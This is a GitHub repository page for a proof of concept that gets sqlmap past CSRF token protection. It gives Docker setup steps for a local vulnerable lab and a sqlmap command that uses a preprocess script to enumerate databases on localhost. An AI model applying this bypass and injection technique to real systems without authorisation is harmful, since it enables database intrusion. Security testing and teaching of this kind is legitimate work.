Skip to content

jalvarezit/CSRF_SQLMap_Bypass

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

11 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

CSRF SQLMap Bypass πŸ’‰

Setup

git clone https://github.com/itasahobby/CSRF_SQLMap_Bypass.git
docker-compose -f .\docker\docker-compose.yaml up --build

PoC

Run the following sqlmap command:

sqlmap -u "http://localhost/index.php?action=0" --method GET --preprocess ./poc/preprocess.py --batch --dbs

There is a more in depth writeup in my blog.

Mentions

Idea inspired by Dreg

About

Bypass csrf token using sqlmap

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •